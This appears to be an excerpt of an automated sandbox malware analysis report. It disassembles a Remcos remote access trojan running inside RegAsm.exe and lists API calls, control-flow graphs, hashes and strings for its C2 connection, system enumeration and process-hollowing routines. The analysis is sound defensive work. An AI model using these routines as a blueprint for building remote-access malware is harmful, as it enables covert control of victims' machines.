                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,0040A1F2), ref: 00414F9B
                                  • GetProcAddress.KERNEL32(00000000), ref: 00414F9E
                                  • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,0040A1F2), ref: 00414FAF
                                  • GetProcAddress.KERNEL32(00000000), ref: 00414FB2
                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,0040A1F2), ref: 00414FC3
                                  • GetProcAddress.KERNEL32(00000000), ref: 00414FC6
                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,0040A1F2), ref: 00414FD7
                                  • GetProcAddress.KERNEL32(00000000), ref: 00414FDA
                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,0040A1F2), ref: 00414FEB
                                  • GetProcAddress.KERNEL32(00000000), ref: 00414FEE
                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,0040A1F2), ref: 00414FFF
                                  • GetProcAddress.KERNEL32(00000000), ref: 00415002
                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,0040A1F2), ref: 00415013
                                  • GetProcAddress.KERNEL32(00000000), ref: 00415016
                                  • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,0040A1F2), ref: 00415024
                                  • GetProcAddress.KERNEL32(00000000), ref: 00415027
                                  • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,0040A1F2), ref: 00415038
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041503B
                                  • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,0040A1F2), ref: 0041504C
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041504F
                                  • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,0040A1F2), ref: 00415060
                                  • GetProcAddress.KERNEL32(00000000), ref: 00415063
                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,0040A1F2), ref: 00415074
                                  • GetProcAddress.KERNEL32(00000000), ref: 00415077
                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,0040A1F2), ref: 00415088
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041508B
                                  • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,0040A1F2), ref: 0041509C
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041509F
                                  • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,0040A1F2), ref: 004150AB
                                  • GetProcAddress.KERNEL32(00000000), ref: 004150AE
                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,0040A1F2), ref: 004150BB
                                  • GetProcAddress.KERNEL32(00000000), ref: 004150BE
                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,0040A1F2), ref: 004150C6
                                  • GetProcAddress.KERNEL32(00000000), ref: 004150C9
                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,0040A1F2), ref: 004150D1
                                  • GetProcAddress.KERNEL32(00000000), ref: 004150D4
                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,0040A1F2), ref: 004150DC
                                  • GetProcAddress.KERNEL32(00000000), ref: 004150DF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad$HandleModule
                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                  • API String ID: 4236061018-3687161714
                                  • Opcode ID: 42f43bac1a948978ef40ac34bead5871a9a47ad840c4e162dcb489b325ed74a5
                                  • Instruction ID: d3d602bbfd1a93ba908cf2750ad540eaaa7976be03134fdad1e537fc9d893f35
                                  • Opcode Fuzzy Hash: 42f43bac1a948978ef40ac34bead5871a9a47ad840c4e162dcb489b325ed74a5
                                  • Instruction Fuzzy Hash: 1D41BBA0E9435876DA107BF25C4EE1F2D5CD965B9A3214937B804931A3E9FC850CCEAF

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 0040CFD6: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 0040CFF6
                                    • Part of subcall function 0040CFD6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00467F30), ref: 0040D014
                                    • Part of subcall function 0040CFD6: RegCloseKey.KERNEL32(?), ref: 0040D01F
                                  • Sleep.KERNEL32(00000BB8), ref: 0040A76B
                                  • ExitProcess.KERNEL32 ref: 0040A7CC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                  • String ID: 5.2.0 Light$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$override
                                  • API String ID: 2281282204-890045707
                                  • Opcode ID: 81446d6b37e19536808f20368c0a2769ef597eabf70b5911a7188f0c72a157a4
                                  • Instruction ID: 240a189e5f2994f65e702c6cd8730735317bc8827ab5a1e8e31b0d69f5303e7b
                                  • Opcode Fuzzy Hash: 81446d6b37e19536808f20368c0a2769ef597eabf70b5911a7188f0c72a157a4
                                  • Instruction Fuzzy Hash: BE21A161F1430067C6087A76494B92E3A69AB91719F40853EB501772CBEE7DCE09839F

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 850 401d6f-401d7d 851 401d83-401d8a 850->851 852 401e08 850->852 854 401d92-401d99 851->854 855 401d8c-401d90 851->855 853 401e0a-401e0f 852->853 856 401dde-401e06 CreateEventA CreateThread 854->856 857 401d9b-401dd9 GetLocalTime call 414155 call 402a6d call 402178 call 413bcc call 402091 854->857 855->856 856->853 857->856
                                  APIs
                                  • GetLocalTime.KERNEL32(?), ref: 00401D9F
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00401DEB
                                  • CreateThread.KERNEL32(00000000,00000000,Function_00001F6E,?,00000000,00000000), ref: 00401DFE
                                  Strings
                                  • KeepAlive | Enabled | Timeout: , xrefs: 00401DB2
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Create$EventLocalThreadTime
                                  • String ID: KeepAlive | Enabled | Timeout:
                                  • API String ID: 2532271599-1507639952
                                  • Opcode ID: ab6cd12e4c77e3ff0bc5752a9040543b502797b98fb7871ef28a19b8e7a071aa
                                  • Instruction ID: 14f6ff0f928cbc8e7ea3c6c14a44142007350dfeddf002f6c212d4b5ee299eb4
                                  • Opcode Fuzzy Hash: ab6cd12e4c77e3ff0bc5752a9040543b502797b98fb7871ef28a19b8e7a071aa
                                  • Instruction Fuzzy Hash: FE11E3319042847BCB20A77B8C0DEAB7FA89BD3710F04056FF841522A2D6B89485C7A6

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 893 42b1e6-42b203 CryptAcquireContextA 894 42b205 893->894 895 42b20a-42b218 CryptGenRandom 893->895 896 42b207-42b208 894->896 897 42b21a-42b21c 895->897 898 42b21e-42b228 CryptReleaseContext 895->898 899 42b22a-42b22d 896->899 897->896 898->899
                                  APIs
                                  • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000001,?,0042AF9D,00000024,00000006,00000000,00000000), ref: 0042B1FB
                                  • CryptGenRandom.ADVAPI32(00000000,00000000,?,?,0042AF9D,00000024,00000006,00000000,00000000,?,?,?,?,?,?,004257BF), ref: 0042B210
                                  • CryptReleaseContext.ADVAPI32(00000000,00000000,?,0042AF9D,00000024,00000006,00000000,00000000,?,?,?,?,?,?,004257BF,00000006), ref: 0042B222
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Crypt$Context$AcquireRandomRelease
                                  • String ID:
                                  • API String ID: 1815803762-0
                                  • Opcode ID: 33666291a48df33b97865c7735f96ec22d4ab982dbbf97e17dc0500a6a6ac30a
                                  • Instruction ID: ae164a0b830f0c37185ea5edcc456d824eb1b24de8e49cb4941b3ca088d84150
                                  • Opcode Fuzzy Hash: 33666291a48df33b97865c7735f96ec22d4ab982dbbf97e17dc0500a6a6ac30a
                                  • Instruction Fuzzy Hash: 40F0E535304320FAEB311F11BC08F5B3F58EB86769F600536F215D60E0D652840186AC
                                  APIs
                                  • GetComputerNameExW.KERNEL32(00000001,?,0040A4C5,771B0F10), ref: 00413D07
                                  • GetUserNameW.ADVAPI32(?,?), ref: 00413D1F
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Name$ComputerUser
                                  • String ID:
                                  • API String ID: 4229901323-0
                                  • Opcode ID: b1f2df65207455d77ad9d03485450b695ee0ae644f4d1b8632ad811ce627442e
                                  • Instruction ID: a952002a6ad584f3fd3bec97d2cc9e930b8157fb69aa19e269c8ae3064c7d3f6
                                  • Opcode Fuzzy Hash: b1f2df65207455d77ad9d03485450b695ee0ae644f4d1b8632ad811ce627442e
                                  • Instruction Fuzzy Hash: 7501FF7590011CABCB05EBD4DC45EDEBB7CAF44309F10017AB505B7191EEB46B8D8B99
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: recv
                                  • String ID:
                                  • API String ID: 1507349165-0
                                  • Opcode ID: 532093c6f76482cd0ae604881977202e10d5a63e0d491930662c20af42320fe7
                                  • Instruction ID: b47cd2b0b3629d5b1c575afa7cea5eba1438416837a73112e9b8902fd82cf9e3
                                  • Opcode Fuzzy Hash: 532093c6f76482cd0ae604881977202e10d5a63e0d491930662c20af42320fe7
                                  • Instruction Fuzzy Hash: B1C04C79504208BB9B051FA19C18D793B69D785660B008425B90555190D57799509695

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 5 40e92f-40e977 call 4021c9 call 413e9d call 4021c9 call 4034cf call 402028 call 433426 18 40e986-40e9d2 call 402178 call 4034cf call 4021e0 call 414384 call 4016e4 call 4034cf call 410fbd 5->18 19 40e979-40e980 Sleep 5->19 34 40e9d4-40ea43 call 4034cf call 402020 call 4034cf call 402028 call 4034cf call 402020 call 4034cf call 402028 call 4034cf call 402020 call 4034cf call 402028 call 401585 18->34 35 40ea46-40eae1 call 402178 call 4034cf call 4021e0 call 414384 call 4034cf * 2 call 406ba2 call 404779 call 40209b call 402091 * 2 call 4034cf call 403f83 18->35 19->18 34->35 88 40eaf1-40eaf8 35->88 89 40eae3-40eaef 35->89 90 40eafd-40eb8f call 403f1f call 402a91 call 404804 call 404779 call 402178 call 413bcc call 402091 * 2 call 4034cf call 402028 call 4034cf call 402028 call 40e8ee 88->90 89->90 117 40eb91-40ebd5 WSAGetLastError call 414e7e call 402a6d call 402178 call 413bcc call 402091 90->117 118 40ebda-40ebe8 call 401673 90->118 138 40f460-40f472 call 401c4f call 403583 117->138 123 40ec15-40ec23 call 401d6f call 40170e 118->123 124 40ebea-40ec10 call 402178 * 2 call 413bcc 118->124 135 40ec28-40ec2a 123->135 124->138 135->138 139 40ec30-40ed8d call 4034cf * 2 call 402a91 call 404804 call 404779 call 404804 call 404779 call 402178 call 413bcc call 402091 * 4 call 413dcc call 40dfc6 call 403509 * 2 call 437a48 call 4034cf call 4021e0 call 402020 call 402028 * 2 call 40d18b 135->139 153 40f474-40f494 call 4034cf call 402028 call 433426 Sleep 138->153 154 40f49a-40f4a2 call 4034fa 138->154 207 40eda1-40edcb call 402028 call 40d033 139->207 208 40ed8f-40ed9c call 403f1f 139->208 153->154 154->35 214 40edd2-40f45b call 403509 call 409344 call 414209 call 4142e7 call 414155 call 4034cf GetTickCount call 414155 call 4140ad call 414155 call 41405d call 4142e7 * 5 call 40a7d3 call 4142e7 call 4047c1 call 406ae8 call 404779 call 406ae8 call 404779 * 3 call 406ae8 call 404779 call 404804 call 404779 call 404804 call 404779 call 406ae8 call 404779 call 406ae8 call 404779 call 406ae8 call 404779 call 406ae8 call 404779 call 404804 call 404779 call 406ae8 call 404779 call 406ae8 call 404779 call 404804 call 404779 * 5 call 406ae8 call 404779 call 406ae8 call 404779 * 7 call 406ae8 call 4018e7 call 402091 * 50 call 4034ff call 402091 * 5 call 4034ff call 401a3c call 403ee2 call 402178 * 2 call 413bcc call 402091 * 2 call 4034ff * 2 207->214 215 40edcd-40edcf 207->215 208->207 214->138 215->214
                                  APIs
                                  • Sleep.KERNEL32(00000000,00000029,00000000,771B0F10,00467F30), ref: 0040E980
                                  • WSAGetLastError.WS2_32(00000000,00000001), ref: 0040EB91
                                  • Sleep.KERNEL32(00000000,00000002), ref: 0040F494
                                    • Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep$ErrorLastLocalTime
                                  • String ID: | $%I64u$5.2.0 Light$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $X|F$X|F$\~F$\~F$\~F$hlight$name
                                  • API String ID: 524882891-4245088108
                                  • Opcode ID: c9c1c96829686e584258ccecebe580d46eaf4c8e35c9a3edde34dd545479c2d1
                                  • Instruction ID: b6ca194f84a5d1c98b5920ce75ddcdd8fe9fcf0a86d7d700392620a7e0496257
                                  • Opcode Fuzzy Hash: c9c1c96829686e584258ccecebe580d46eaf4c8e35c9a3edde34dd545479c2d1
                                  • Instruction Fuzzy Hash: 5D52AD71A002145ACB19F732DD66AEEB3759F90308F5041BFB60A761D2EF781F88CA59

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 473 40a1d6-40a24d call 414eed GetModuleFileNameW call 40a60c call 4021e0 * 2 call 414384 call 40a9e5 call 4034fa 488 40a2a7-40a326 call 4034cf * 2 call 402a91 call 404804 call 40209b call 402091 * 2 call 4034cf call 402077 call 403f1f call 4087ef 473->488 489 40a24f-40a253 473->489 529 40a328-40a32a 488->529 530 40a33f-40a346 488->530 489->488 491 40a255-40a25b 489->491 491->488 493 40a25d-40a2a2 call 40aa8b call 4034cf call 402028 call 40be14 call 40aa3c call 40a5f9 491->493 519 40a32b-40a33c call 402091 493->519 529->519 531 40a348 530->531 532 40a34a-40a356 call 4139a6 530->532 531->532 535 40a358-40a35a 532->535 536 40a35f-40a3b5 call 4034cf call 414225 call 4064d4 call 4034ff call 4034cf * 4 call 402028 532->536 535->536 556 40a3b7-40a3c7 call 4034cf call 402028 536->556 557 40a41e-40a478 call 4034cf call 402028 call 402178 call 402028 call 40d202 call 4034cf call 402028 call 433426 536->557 566 40a3ca-40a3d3 556->566 591 40a47a-40a47c 557->591 592 40a47e-40a480 557->592 566->566 568 40a3d5-40a3d9 566->568 568->557 570 40a3db-40a419 call 4034cf call 402028 call 4034cf call 402028 call 40900f call 4064d4 call 4034ff 568->570 570->557 594 40a484-40a493 call 415128 CreateThread 591->594 595 40a482 592->595 596 40a495-40a4e0 call 402178 * 2 call 413bcc call 413cea call 4064d4 call 4034ff 592->596 594->596 595->594 613 40a4e2-40a4e3 SetProcessDEPPolicy 596->613 614 40a4e5-40a4f8 CreateThread 596->614 613->614 615 40a506 614->615 616 40a4fa-40a4fd 614->616 617 40a50b-40a53b call 402178 call 402a6d call 402178 call 413bcc call 402091 615->617 618 40a540-40a55b call 402028 call 40cf8c 616->618 619 40a4ff-40a504 616->619 617->618 628 40a561-40a598 call 414225 call 404c42 call 40d0a8 call 4034ff call 404c42 618->628 629 40a5ee-40a5f8 call 4092fd call 40e92f 618->629 619->617 649 40a5b1-40a5b6 DeleteFileW 628->649 650 40a5b8-40a5e9 call 414225 call 404c42 call 40d444 call 4034ff * 2 649->650 651 40a59a-40a59d 649->651 650->629 651->650 653 40a59f-40a5ac Sleep call 404c42 651->653 653->649
                                  APIs
                                    • Part of subcall function 00414EED: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,0040A1F2), ref: 00414F00
                                    • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F09
                                    • Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,0040A1F2), ref: 00414F24
                                    • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F27
                                    • Part of subcall function 00414EED: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,0040A1F2), ref: 00414F38
                                    • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F3B
                                    • Part of subcall function 00414EED: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,0040A1F2), ref: 00414F50
                                    • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F53
                                    • Part of subcall function 00414EED: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,0040A1F2), ref: 00414F64
                                    • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F67
                                    • Part of subcall function 00414EED: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,0040A1F2), ref: 00414F73
                                    • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F76
                                    • Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,0040A1F2), ref: 00414F87
                                    • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F8A
                                    • Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,0040A1F2), ref: 00414F9B
                                    • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F9E
                                    • Part of subcall function 00414EED: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,0040A1F2), ref: 00414FAF
                                    • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414FB2
                                    • Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,0040A1F2), ref: 00414FC3
                                    • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414FC6
                                    • Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,0040A1F2), ref: 00414FD7
                                    • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414FDA
                                    • Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,0040A1F2), ref: 00414FEB
                                    • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414FEE
                                    • Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,0040A1F2), ref: 00414FFF
                                    • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00415002
                                    • Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,0040A1F2), ref: 00415013
                                    • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00415016
                                    • Part of subcall function 00414EED: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,0040A1F2), ref: 00415024
                                    • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00415027
                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040A1FF
                                  • CreateThread.KERNEL32(00000000,00000000,00415962,00000000,00000000,00000000), ref: 0040A493
                                  • SetProcessDEPPolicy.KERNEL32(00000000,00000000), ref: 0040A4E3
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A6C0,00000000,00000000,00000000), ref: 0040A4EF
                                  • DeleteFileW.KERNEL32(00000000), ref: 0040A5B2
                                    • Part of subcall function 0040BE14: __EH_prolog.LIBCMT ref: 0040BE19
                                  • Sleep.KERNEL32(0000000A), ref: 0040A5A2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Module$Handle$LibraryLoad$CreateFileThread$DeleteH_prologNamePolicyProcessSleep
                                  • String ID: Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Remcos Agent initialized$Software\$User$\~F$\~F$del$del$licence$license_code.txt
                                  • API String ID: 4062606258-4101538746
                                  • Opcode ID: 1a2fb5a21dc49659a6c9c268f648253f3852bd4a62c79b0911b4e818184a8f0f
                                  • Instruction ID: bf820840e173d3e8500347ecd1b7a27ce46e39732b77903c3f998a6fae3a9d47
                                  • Opcode Fuzzy Hash: 1a2fb5a21dc49659a6c9c268f648253f3852bd4a62c79b0911b4e818184a8f0f
                                  • Instruction Fuzzy Hash: 66A1903071430067C619BB769D57A6E269A9BC0709F10493FF6467B2C2EEBC9E09825E

                                  Control-flow Graph

                                  APIs
                                  • connect.WS2_32(?,?,?), ref: 00401726
                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00401846
                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00401854
                                  • WSAGetLastError.WS2_32 ref: 00401867
                                    • Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                  • API String ID: 994465650-2151626615
                                  • Opcode ID: a9d4ec1c28e949222569c7cdcf8c37c729a4468b9ecae551f0147a98f0a931c4
                                  • Instruction ID: cc572a4a7b8cc2dd4c8a1b63f7d6ff9f2a059f33d68be0fa136a37d341ce95d8
                                  • Opcode Fuzzy Hash: a9d4ec1c28e949222569c7cdcf8c37c729a4468b9ecae551f0147a98f0a931c4
                                  • Instruction Fuzzy Hash: CB41E531B10201B7DB147BBA891F96D7A26AB82309B40412FEC01276D3EA7D9D1987DF

                                  Control-flow Graph

                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00401FE3,?,?,?,00401F7A), ref: 00401C59
                                  • SetEvent.KERNEL32(?,?,?,00000000,00401FE3,?,?,?,00401F7A), ref: 00401C68
                                  • CloseHandle.KERNEL32(?,?,?,00000000,00401FE3,?,?,?,00401F7A), ref: 00401C71
                                  • closesocket.WS2_32(000000FF), ref: 00401C7F
                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00401FE3,?,?,?,00401F7A), ref: 00401CB6
                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401FE3), ref: 00401CCB
                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401CD2
                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401FE3), ref: 00401CE7
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401FE3), ref: 00401CEC
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401FE3), ref: 00401CF1
                                  • SetEvent.KERNEL32(?,?,?,00000000,00401FE3,?,?,?,00401F7A), ref: 00401CFE
                                  • CloseHandle.KERNEL32(?,?,?,00000000,00401FE3,?,?,?,00401F7A), ref: 00401D03
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                  • String ID:
                                  • API String ID: 3658366068-0
                                  • Opcode ID: f497eed2d3fc3337d417e3aefa93303116c875cddcb4f4683ac269fad97ca0d7
                                  • Instruction ID: 647261f9900fe491da89cb5d5ae73573130af4b1a9831dc02a6027ad4db015cc
                                  • Opcode Fuzzy Hash: f497eed2d3fc3337d417e3aefa93303116c875cddcb4f4683ac269fad97ca0d7
                                  • Instruction Fuzzy Hash: EA213B31544B01AFD7316F21ED09B1ABBA2FF41326F104A6DE0E611AF0CB75E851DB58

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00414452: GetCurrentProcess.KERNEL32(00000000,?,00000002,0040907E,WinDir,00000000,00000000), ref: 00414463
                                    • Part of subcall function 0040D033: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 0040D057
                                    • Part of subcall function 0040D033: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 0040D074
                                    • Part of subcall function 0040D033: RegCloseKey.KERNEL32(?), ref: 0040D07F
                                  • StrToIntA.SHLWAPI(00000000,0045F27C,?,00000000,00000000,?,00467E5C,Exe,00000000,0000000E,00000000,004595AC,00000003,00000000), ref: 00413A1C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseCurrentOpenProcessQueryValue
                                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                  • API String ID: 1866151309-2070987746
                                  • Opcode ID: e279c73c5175a0df0bccc04d70c48d34f1762d2b2d67484434f5c33ee602fcd9
                                  • Instruction ID: 1917af8823246703e0b69b16f84be6404e949fb754efc197e49d965c963a868a
                                  • Opcode Fuzzy Hash: e279c73c5175a0df0bccc04d70c48d34f1762d2b2d67484434f5c33ee602fcd9
                                  • Instruction Fuzzy Hash: B01106B0A402405AC600F7A59D4BAAFB7589B44309F94017FFA45A31D3EAAD1D8D82AF

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 782 43c698-43c6af GetLastError 783 43c6b1-43c6bb call 43d27d 782->783 784 43c6bd-43c6c4 call 43af95 782->784 783->784 789 43c70e-43c715 SetLastError 783->789 788 43c6c9-43c6cf 784->788 790 43c6d1 788->790 791 43c6da-43c6e8 call 43d2d3 788->791 792 43c717-43c71c 789->792 793 43c6d2-43c6d8 call 43beb5 790->793 797 43c6ea-43c6eb 791->797 798 43c6ed-43c703 call 43c486 call 43beb5 791->798 801 43c705-43c70c SetLastError 793->801 797->793 798->789 798->801 801->792
                                  APIs
                                  • GetLastError.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00432251,00000000,00467F30,?,004322D5,00000000,00000000,00000000,00000000,00000000,?,00467F30), ref: 0043C69D
                                  • _free.LIBCMT ref: 0043C6D2
                                  • _free.LIBCMT ref: 0043C6F9
